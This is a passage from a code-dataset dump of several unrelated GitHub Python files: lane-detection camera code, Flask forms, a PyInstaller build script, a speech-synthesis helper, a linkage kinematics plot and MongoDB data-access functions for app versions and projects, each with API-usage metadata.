"line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "24404590871", "text": "# Lane Testing\n\nfrom LaneFollower import LaneFollower\nfrom CarControl import CarControl\nfrom matplotlib import pyplot as plt\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\n\nleftColorMin = [90, 245, 180] # Yellow - Determined by plotting imgHSV and hovering over the colors\nleftColorMax = [100, 255, 210] # Yellow\nrightColorMin = [5, 15, 170] # White\nrightColorMax = [20, 40, 230] # White\n\nLF = LaneFollower()\n\nvs = cv2.VideoCapture(\"/dev/video2\", cv2.CAP_V4L) # ls -ltr /dev/video*\n# M = np.load(\"M.npy\")\n\nwhile True:\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n \n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n\n\n LF.update_picture(frame)\n\n img = LF.convert_to_HSV(frame)\n leftMask = LF.filter_by_color(img, leftColorMin, leftColorMax)\n rightMask = LF.filter_by_color(img, rightColorMin, rightColorMax)\n\n leftCanny = LF.canny_img(leftMask)\n rightCanny = LF.canny_img(rightMask)\n\n leftCropped = LF.crop_image(leftCanny)\n rightCropped = LF.crop_image(rightCanny)\n\n leftLines = LF.hough_lines(leftCropped)\n rightLines = LF.hough_lines(rightCropped)\n\n\n try:\n left_line_x, left_line_y, right_line_x, right_line_y = LF.find_lines(leftLines, rightLines)\n\n leftFinal, left_points = LF.calculate_lines(rawImg, left_line_x, left_line_y, 1)\n rightFinal, right_points = LF.calculate_lines(leftFinal, right_line_x, right_line_y, 1)\n except:\n rightFinal = img\n\n image = rightFinal\n\n\n cv2.imshow(\"Camera Feed\", image)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord(\"q\"):\n break\n \nvs.release()\ncv2.destroyAllWindoes()\n\n\n\n", "repo_name": "kalinnorman/SDCars", "sub_path": "class_code/laneTesting.py", "file_name": "laneTesting.py", "file_ext": "py", "file_size_in_byte": 1732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "LaneFollower.LaneFollower", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.CAP_V4L", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindoes", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "34812120111", "text": "from flask_wtf import FlaskForm\nfrom wtforms import validators, StringField\nfrom wtforms.widgets import TextArea\nfrom flask_wtf.file import FileField, FileAllowed\n\nclass FeedPostForm(FlaskForm):\n image = FileField('Profile image', validators=[\n FileAllowed(['jpg', 'jpeg', 'png', 'gif', 'PNG'], 'Only JPEG, PNG and GIFs allowed')\n ])\n post = StringField('Post',\n\n widget=TextArea(),\n\n validators=[\n \n validators.DataRequired(),\n validators.Length(max=1024)\n ])\n\nclass PrivateMessageForm(FlaskForm):\n message = StringField('Message',\n\n widget=TextArea(),\n\n validators=[\n \n validators.DataRequired(), \n validators.Length(max=1024)\n ])", "repo_name": "darwonsamal/Rashid_Darwon_set09103_cw2", "sub_path": "forms/feed.py", "file_name": "feed.py", "file_ext": "py", "file_size_in_byte": 807, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_wtf.FlaskForm", 
"line_number": 6, "usage_type": "name"}, {"api_name": "flask_wtf.file.FileField", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 8, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 10, "usage_type": "call"}, {"api_name": "wtforms.widgets.TextArea", "line_number": 12, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 16, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 16, "usage_type": "name"}, {"api_name": "wtforms.validators.Length", "line_number": 17, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 17, "usage_type": "name"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 20, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.widgets.TextArea", "line_number": 23, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 27, "usage_type": "name"}, {"api_name": "wtforms.validators.Length", "line_number": 28, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "22713802011", "text": "\"\"\"Build Corkscrew\n\nThis script runs PyInstaller and by default, the installer build script for the current platform. It should be run \nform the root folder with \"python build/build.py\". It accepts an optional parameter -NI (or --no-installer) to prevent\nthe script from generating an installer.\n\n`UPX `_ can be used by PyInstaller by adding a folder named \"upx\" inside the project\nroot containing a UPX release's files.\n\nFor Windows installer building you'll need Inno Setup 6 installed.\"\"\"\nimport os\nimport platform\nimport shutil\nimport PyInstaller.__main__\nimport sys\nimport installer\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport main\nimport util\n\ncurrent_platform = platform.system()\n\nversion = main.__version\nversion_split = version.split(\".\")\n\n# Make Version Info file for Windows\ntemp_ver_info_file = \"file_version_info.temp\"\ntags = [\n (\"#VERSION#\", version),\n (\"#VERSION_TUPLE#\", f\"{version_split[0]}, {version_split[1]}, {version_split[2]}, 0\")\n ]\nutil.replace_instances(\"build/file_version.txt\", tags, temp_ver_info_file)\n\n# Choose right icon\nif current_platform == \"Darwin\":\n icon_file = \"resources/icon.icns\"\nelif current_platform == \"Windows\":\n icon_file = \"resources/icon.ico\"\n\nargs = [\n \"main.py\",\n \"--icon=%s\" % icon_file,\n \"--name=%s\" % \"Corkscrew\",\n \"--version-file=%s\" % temp_ver_info_file,\n \"--noconsole\",\n \"--onefile\",\n \"--workpath=%s\" % \"pyinstaller_temp\",\n \"--osx-bundle-identifier=%s\" % \"com.androidwg.corkscrew\"\n]\n\n# Leaving this here in case we need it in the future\n# for file in files_to_bundle:\n# file_formatted = file\n# if current_platform != \"Windows\":\n# file_formatted = file.replace(\";\", \":\")\n#\n# arg = \"--add-data=%s\" % file_formatted\n# args.append(arg)\n\n# If UPX folder is found inside root, make sure that PyInstaller uses it\nif os.path.exists(\"../upx/\"):\n args.append(\"--upx-dir=%s\" % \"upx/\")\n\n# Run PyInstaller\nPyInstaller.__main__.run(args)\n\n# Clean temp file after use\nos.remove(temp_ver_info_file)\ntry:\n shutil.rmtree(\"pyinstaller_temp\")\nexcept FileNotFoundError:\n pass\n\n# Make platform installer\nif not 
sys.argv.__contains__(\"--no-installer\") and not sys.argv.__contains__(\"-NI\"):\n if current_platform == \"Windows\":\n installer.make_windows_installer(version)\n elif current_platform == \"Darwin\":\n installer.make_macos_installer(version)\n\nprint(f\"Finished building version {version}\")\n", "repo_name": "androidWG/Corkscrew", "sub_path": "build/build.py", "file_name": "build.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 22, "usage_type": "call"}, {"api_name": "main.__version", "line_number": 24, "usage_type": "attribute"}, {"api_name": "util.replace_instances", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyInstaller.__main__.__main__.run", "line_number": 66, "usage_type": "call"}, {"api_name": "PyInstaller.__main__.__main__", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyInstaller.__main__", "line_number": 66, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 69, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.argv.__contains__", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "installer.make_windows_installer", "line_number": 78, "usage_type": "call"}, {"api_name": "installer.make_macos_installer", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13438991488", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport sys\nimport time\nimport os\nimport re\nimport random\nfrom aip import AipSpeech\nimport logging\nLOG_FORMAT = \"%(asctime)s - %(levelname)s - %(message)s\" # log output format\nDATE_FORMAT = \"%m/%d/%Y %H:%M:%S %p\" # date format\nfp = logging.FileHandler(sys.path[0] + '/keepcat.log', encoding='utf-8')\nfs = logging.StreamHandler()\nlogging.basicConfig(level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT, handlers=[fp, fs]) # apply the logging configuration\nuserid = ''\ncompleted = False\nwork_dir = sys.path[0]\n# Fill in the Baidu speech keys you applied for.\napp_id = ''\napi_key = ''\nsecret_key = ''\n\ndef save(msg,path):\n client = AipSpeech(app_id,api_key,secret_key)\n result = client.synthesis(msg,'zh',1,{'vol':9,'per':1})\n logging.info(path)\n f = open(path,'wb')\n f.write(result)\n f.close()\n \n\ndef get_file_content(filePath):\n fp = open(filePath, 'rb')\n content = fp.read()\n client = AipSpeech(app_id,api_key,secret_key)\n # 2. Convert the audio to text\n res = client.asr(content, 'pcm', 16000, {\n # Takes effect when the lan parameter is omitted; if none is given, the default is 1537 (Mandarin input-method model); see the dev_pid table at the start of this section\n 'dev_pid': 1536,\n })\n logging.info(res)\n return res.get('result')[0]\n\ndef play(msg,filename,playIt=True,update=False):\n path = work_dir + '/' + filename + '.mp3'\n if os.path.exists(path) == False or update:\n save(msg,path)\n if playIt:\n os.system('play ' + path)\n \n\ndef say():\n wakeup = '天猫精灵'\n say = sys.argv[1]\n logging.info('say: ' + say)\n play(wakeup,'tmjl')\n time.sleep(0.8)\n 
play(say,'says',True,True)\n\nif __name__ == \"__main__\":\n say()\n", "repo_name": "j1111011/keepcat", "sub_path": "says.py", "file_name": "says.py", "file_ext": "py", "file_size_in_byte": 1721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.FileHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "aip.AipSpeech", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "aip.AipSpeech", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 57, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "14629784541", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 05 17:56:50 2016\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import *\r\nfrom numpy import sin, cos, pi, array\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nfrom mpl_toolkits.mplot3d import axes3d, Axes3D\r\nfrom matplotlib import cm\r\nplt.close(\"all\")\r\n#http://matplotlib.org/mpl_examples/mplot3d/subplot3d_demo.py\r\nd2r=pi/180.0\r\n#right=1.0-0.01\r\n#left=1.70\r\nratio_array=[]\r\nrls=[i*0.97/10 for i in range(0,1)]\r\nlls=[1+i*0.73/10 for i in range(0,1)]\r\nXX, YY=np.meshgrid(rls, lls)\r\nZZ=[]\r\nPA=[]\r\nAP=[]\r\nRR=[]\r\nRA=[]\r\nAA=[]\r\nfor ll in [1.65]:#lls:\r\n zz=[]\r\n pa=[]\r\n rr=[]\r\n ap=[]\r\n ra=[]\r\n aa=[]\r\n for rl in [0.97]:#rls:\r\n right=rl #0.8\r\n left=(ll+1*0) #1.73\r\n DT=left-right\r\n X=np.linspace(right, -left, 100)\r\n #X=np.linspace(0.8, -0.8-DT, 100)\r\n x2p1=X*X+1\r\n a=4*x2p1\r\n b=-4*x2p1*X\r\n c=x2p1*x2p1-4\r\n cs1=(-b+np.sqrt(b*b-4*a*c))/(2*a)\r\n #cs2=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n th1=np.arccos(cs1)/d2r\r\n ss=np.sin(th1*d2r)\r\n cs=np.cos(th1*d2r)\r\n ss2=1.0-ss\r\n cs2=X-cs\r\n th2=np.arctan2(ss2,cs2)/d2r\r\n X1=cs\r\n Y1=ss\r\n pressureangle1=th2-th1\r\n b4ac1=cs*cs+2*ss-1\r\n ratio1=-ss-(-cs*ss+cs)/np.sqrt(b4ac1)\r\n a11=ratio1\r\n X2=X1+cos(th2*d2r)\r\n Y2=Y1+sin(th2*d2r)\r\n #ratio12=-np.cos(th1)+(np.cos(th1)-np.sin(2*th1))*np.cos(th1)*(1-np.sin(th1))/b4ac1**1.5+(np.sin(th1)+2*np.cos(th1))/np.sqrt(b4ac1)\r\n dotTheta1=1.0/a11\r\n \r\n a12=-cs+(cs-ss*cs)*(cs-ss*cs)/np.power(b4ac1, 1.5)-(ss*ss-ss-cs*cs)/np.sqrt(b4ac1)\r\n #a12=a12/ratio1**2\r\n \r\n ddotTheta1=-a12*dotTheta1*dotTheta1/a11 \r\n X=X+DT\r\n x2p1=X*X+1\r\n a=4*x2p1\r\n b=-4*x2p1*X\r\n c=x2p1*x2p1-4\r\n cs3=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n #cs2=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n th3=-np.arccos(cs3)/d2r\r\n X3=np.cos(th3*d2r)\r\n Y3=np.sin(th3*d2r)\r\n ss=np.sin(th3*d2r)\r\n cs=np.cos(th3*d2r)\r\n ss4=-1-ss\r\n cs4=X-cs\r\n th4=np.arctan2(ss4,cs4)/d2r\r\n 
pressureangle2=th4-th3\r\n b4ac2=cs*cs-2*ss-1\r\n ratio2=-ss+(-cs*ss-cs)/np.sqrt(b4ac2)\r\n a31=ratio2\r\n X4=X3+cos(th4*d2r)\r\n Y4=Y3+sin(th4*d2r)\r\n dotTheta3=1.0/a31\r\n a32=-cs-(-cs-ss*cs)*(-cs-ss*cs)/np.power(b4ac2, 1.5)+(ss*ss+ss-cs*cs)/np.sqrt(b4ac2)\r\n ddotTheta3=-a32*dotTheta3*dotTheta3/a31\r\n oangle=th1[-1]-th1[0]-th3[-1]+th3[0]\r\n pangle=max(np.max(np.abs(pressureangle1-90)), np.max(np.abs(pressureangle2-90)))\r\n apangle=np.max((np.abs(pressureangle1-90)+np.abs(pressureangle2-90))/2.0)\r\n rangle=(np.abs((pressureangle1-90))+np.abs(pressureangle2-90))/2\r\n rangle=np.sqrt(np.mean(np.square(rangle)))\r\n rr_=np.max(np.abs(1.0/ratio1)+np.abs(1.0/ratio2))\r\n zz.append(oangle)\r\n pa.append(pangle)\r\n ap.append(apangle)\r\n rr.append(rr_)\r\n ra.append(rangle)\r\n aa.append(np.max(ddotTheta1))\r\n ratio_array.append( [rl, ll, oangle, pangle])\r\n \r\n ZZ.append(zz) \r\n PA.append(pa)\r\n RR.append(rr)\r\n AP.append(ap)\r\n RA.append(ra)\r\n AA.append(aa)\r\n \r\nfig, ax1 = plt.subplots()\r\n\r\n#ax2 = ax1.twinx()\r\n#ax1.plot(X-DT, ddotTheta1, 'b-')\r\n#ax2.plot(X-DT, ddotTheta3, 'r-')\r\n#\r\n#ax1.set_xlim([-1.65, .97])\r\n#ax1.set_xlabel('Slider Displacement (Unit L)')\r\n#ax1.set_ylabel(r'$\\ddot{\\theta}_1 (s^{-2})$', color='b')\r\n#ax2.set_ylabel(r'$\\ddot{\\theta}_3 (s^{-2})$', color='r')\r\nplt.plot(X-DT, ddotTheta3-ddotTheta1)\r\nplt.xlim(-1.65, .97)\r\nplt.xlabel('Slider Displacement (Unit L)')\r\nplt.ylabel(r'Relative Derivative Acceleration ($s^{-2}$)')\r\nplt.grid()\r\nplt.show()\r\n", "repo_name": "utbeaver/robot", "sub_path": "slider2d.py", "file_name": "slider2d.py", "file_ext": "py", "file_size_in_byte": 3829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.close", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 90, "usage_type": "call"}, {"api_name": 
"numpy.power", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "42761497758", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@Time: 2021/1/15 9:20\n@Auth: money\n@File: systems.py\n\"\"\"\nimport time\n\nfrom bson.son import SON\n\nfrom initialize import client\nfrom initialize import init_stamp\nfrom constant import constant\nfrom utils.util import generate_uid\n\n\ndef queryVersionList(page, num):\n dataList = []\n count = 0\n error = None\n try:\n pipeline = [\n {\"$match\": {\"state\": 1}},\n {\"$sort\": SON([(\"create_time\", -1)])},\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"version_name\": 1, \"version_str\": 1, \"option\": 1, \"desc\": 1, \"tip_way\": 1,\n \"link\": {\"$concat\": [constant.DOMAIN, \"$link\"]}, \"version_num\": 1, \"create_time\": 1, \"size\": 1\n }\n }\n ]\n\n dataList = list(client[\"version\"].aggregate(pipeline))\n count = client[\"version\"].find({\"state\": 1}).count()\n except Exception as e:\n error = e\n finally:\n return dataList, count, error\n\n\ndef deleteVersion(uid):\n error = None\n try:\n doc = client[\"version\"].find_one({\"uid\": uid}, {\"is_latest\": 1})\n client[\"version\"].update_one({\"uid\": uid}, {\"$set\": {\"state\": -1}})\n if doc:\n if doc.get(\"is_latest\"):\n tmp = client[\"version\"].find_one({\"state\": 1}, {\"uid\": 1, \"version_str\": 1, \"desc\": 1, \"tip_way\": 1},\n sort=[(\"version_num\", -1)])\n if tmp:\n client[\"version\"].update_one({\"uid\": tmp.get(\"uid\")}, {\"$set\": {\"is_latest\": True}})\n if tmp.get(\"tip_way\") != 1:\n 
sendAllUserUpdateVersion(tmp.get(\"version_str\"), tmp.get(\"desc\"))\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef queryVersionNo(version_str, version_num):\n result1 = False\n result2 = False\n error = None\n try:\n doc = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1})\n if doc:\n result1 = True\n doc = client[\"version\"].find_one({\"version_num\": version_num, \"state\": 1})\n if doc:\n result2 = True\n except Exception as e:\n error = e\n finally:\n return result1, result2, error\n\n\ndef insertVersion(uid, name, version_str, option, link, size, desc, version_num, tip_way):\n error = None\n try:\n\n updateAllVersionLatestISFalse()\n client[\"version\"].insert(\n {\n \"uid\": uid, \"version_name\": name, \"version_str\": str(version_str), \"option\": option, \"tip_way\": tip_way,\n \"link\": link, \"size\": float(size), \"create_time\": int(time.time() * 1000), \"desc\": str(desc),\n \"update_time\": int(time.time() * 1000), \"version_num\": version_num, \"state\": 1, \"is_latest\": True\n }\n )\n if tip_way != 1:\n sendAllUserUpdateVersion(version_str, desc)\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef updateVersion(uid, name, version_str, version_num, option, desc, link, size, tip_way):\n error = None\n try:\n updateAllVersionLatestISFalse()\n client[\"version\"].update_one(\n {\"uid\": uid},\n {\n \"$set\": {\n \"version_name\": name, \"version_str\": version_str, \"version_num\": version_num, \"option\": option,\n \"desc\": desc, \"link\": link, \"size\": float(size), \"tip_way\": tip_way, \"is_latest\": True\n }\n }\n )\n if tip_way != 1:\n sendAllUserUpdateVersion(version_str, desc)\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef queryAllVersionNo(uid, version_str, version_num):\n result1 = False\n result2 = False\n error = None\n try:\n tmp = client[\"version\"].find_one({\"uid\": uid, \"state\": 1}, {\"version_str\": 1, \"version_num\": 1})\n if tmp:\n if version_str != tmp.get(\"version_str\"):\n tmp1 = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1}, {\"_id\": 1})\n if tmp1:\n result1 = True\n if version_num != tmp.get(\"version_num\"):\n tmp2 = client[\"version\"].find_one({\"version_num\": version_num, \"state\": 1}, {\"_id\": 1})\n if tmp2:\n result2 = True\n else:\n raise Exception(\"uid does not exist\")\n except Exception as e:\n error = e\n finally:\n return result1, result2, error\n\n\ndef queryVersionNoList():\n dataList = []\n error = None\n try:\n cursor = client[\"version\"].find({\"state\": 1}, {\"_id\": 0, \"version_str\": 1, \"is_latest\": 1})\n dataList = [doc for doc in cursor]\n except Exception as e:\n error = e\n finally:\n return dataList, error\n\n\ndef postLatestVersionNo(version_str):\n error = None\n try:\n updateAllVersionLatestISFalse()\n client[\"version\"].update_one({\"version_str\": version_str, \"state\": 1}, {\"$set\": {\"is_latest\": True}})\n doc = client[\"version\"].find_one({\"version_str\": version_str, \"state\": 1},\n {\"uid\": 1, \"version_str\": 1, \"desc\": 1, \"tip_way\": 1})\n if doc.get(\"tip_way\") != 1:\n sendAllUserUpdateVersion(doc.get(\"version_str\"), doc.get(\"desc\"))\n except Exception as e:\n error = e\n finally:\n return error\n\n\ndef updateAllVersionLatestISFalse():\n client[\"version\"].update({\"state\": 1}, {\"$set\": {\"is_latest\": False}}, multi=True)\n\n\ndef sendAllUserUpdateVersion(version_str, desc):\n error = None\n try:\n uid = generate_uid(24)\n cursor = 
client[\"user\"].find({\"state\": {\"$in\": [0, 1]}})\n for d in cursor:\n client[\"message\"].insert(\n {\n \"uid\": uid, \"user_id\": d.get(\"uid\"), \"push_people\": \"系统消息\",\n \"desc\": f\"发现新版本V{version_str}, 请更新。版本描述:{desc}\", \"type\": 2,\n \"state\": 1, \"create_time\": int(time.time() * 1000), \"update_time\": int(time.time() * 1000)}\n )\n except Exception as e:\n error = e\n finally:\n return error\n", "repo_name": "coinsccg/microfotos", "sub_path": "dao/admin/systems/systems.py", "file_name": "systems.py", "file_ext": "py", "file_size_in_byte": 6269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bson.son.SON", "line_number": 24, "usage_type": "call"}, {"api_name": "constant.constant.DOMAIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 30, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 35, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 36, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 46, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 47, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 50, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 53, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 67, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 70, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 84, "usage_type": "name"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 103, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 125, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 128, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 132, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 147, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 159, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 160, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.util.generate_uid", "line_number": 177, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 178, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 180, "usage_type": "name"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "24403539017", "text": "from typing import List, Dict\n\nfrom pymongo import MongoClient\n\nfrom projects.entities.project import ProjectSchema\nfrom projects.use_cases.abstract_projects_repository import AbstractProjectsRepository\n\n\nclass MongoProjectsRepository(AbstractProjectsRepository):\n def __init__(self) -> None:\n self._schema = ProjectSchema()\n\n def get(self) -> List[ProjectSchema]:\n client = MongoClient(\n 'mongodb://mongo:27017/',\n socketTimeoutMS=3000,\n connectTimeoutMS=3000,\n serverSelectionTimeoutMS=3000\n )\n database = client.projects\n collection = database.projects\n\n return list(map(self._load, collection.find()))\n\n def _load(self, data: Dict) -> ProjectSchema:\n project = self._schema.load(data) # type: ProjectSchema\n return project\n", "repo_name": "jdgillespie91/projects-api", "sub_path": 
"projects/adapters/mongo_projects_repository.py", "file_name": "mongo_projects_repository.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "projects.use_cases.abstract_projects_repository.AbstractProjectsRepository", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 11, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 25, "usage_type": "name"}, {"api_name": "projects.entities.project.ProjectSchema", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "9307183701", "text": "from typing import List, Optional, Tuple\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pydantic import BaseModel, 